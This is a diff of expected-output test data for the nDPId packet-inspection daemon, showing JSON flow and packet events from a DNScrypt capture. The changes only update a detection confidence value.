+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":237,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312132} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":237,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAABQwbYAub0RkXcKAAABLZm7YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAIcwbdAAL0RUGMKAAABLZm7YLPvEPcCCKvPMPYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312132,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAXcwbkgAL0RbKEKAAABLZm7YJ4DEPcGBMSXMPcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":241,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312132} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":241,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAABQwbkAub0RkXQKAAABLZm7YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":946739312132,"pkt":"ZmZmZmZmRERERERECABFAADZ1M0AADURfjozDz5BCgAAAQG7gvEAxUKLxUSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAG60zsERLlFII2wj6zTIwofCbgq4wxjKMp9YEu9fS884Cf11c1Q4cTQ+J+ZjK7ZH4aaqK8VPbAGFYW80ueYrfwU8FAQJxEup2Hwk1EI2Qz7npiyDDRkpQyGDCxkaPRZtbjwUBAnES6nYAAAAAV9TrQRfVP6E"} 
@@ -497,26 +497,26 @@ 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":946739312183,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739312183,"pkt":"ZmZmZmZmRERERERECABFAADWP4JAADYRWt8tmbtgCgAAARD3ngMAwicyMPeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAJDQ0ZbvRpC3D0bgumZKuy3tvg+CeWgIXh45Ishvbc3SjW3OKRxUShg2C7mIARv2NR589zRzZQEE1IcPTnNuvwAPMT4OYzIpCP1X\/njGK43zV6uPrF4F7max8o8+EVSzPA8xPg5jMikIAAAAAV9TfFZfVM3W"} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAIcaDJAAL0RMhoKAAABQlUec9pYAbsCCCOeLCwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAXcaDMgAL0RTlkKAAABQlUec71AAbsGBPfPLCkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":254,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312286} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":254,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAABQaDMAub0RcywKAAABQlUecwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
